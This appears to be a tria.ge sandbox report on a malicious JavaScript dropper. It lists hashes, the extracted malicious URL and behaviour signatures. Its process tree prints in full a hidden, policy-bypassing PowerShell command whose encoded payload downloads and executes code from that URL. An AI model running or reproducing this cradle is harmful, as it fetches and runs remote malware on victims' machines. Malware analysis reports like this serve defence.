Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
15/03/2024, 14:10
Static task
static1
Behavioral task
behavioral1
Sample
cb9bb9fe4729d711117ad59954345253.js
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
cb9bb9fe4729d711117ad59954345253.js
Resource
win10v2004-20240226-en
General
-
Target
cb9bb9fe4729d711117ad59954345253.js
-
Size
139KB
-
MD5
cb9bb9fe4729d711117ad59954345253
-
SHA1
259df8492477a434755722941f30ac55b67b4527
-
SHA256
570738dbd47c6e17c764ed50451f1f9b6bb1d69cafbb24d134cdc5e39e0594db
-
SHA512
868d72f39c4a5257d9980acf939fc34c22f730c772d8adc4727081cae6e569a1b7485c8ca8b3d0aaf1e6375810e89b5ac00817a7e13982b248c52f784bc703cc
-
SSDEEP
3072:hkwt8kyLG9u53QwDd9Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kVW:hIky69uxQwJ9Ry9RuXqW4SzUHmLKeMMS
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2636 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2636 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2700 wrote to memory of 2540 2700 wscript.exe 28 PID 2700 wrote to memory of 2540 2700 wscript.exe 28 PID 2700 wrote to memory of 2540 2700 wscript.exe 28 PID 2540 wrote to memory of 2636 2540 cmd.exe 30 PID 2540 wrote to memory of 2636 2540 cmd.exe 30 PID 2540 wrote to memory of 2636 2540 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\cb9bb9fe4729d711117ad59954345253.js1⤵
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-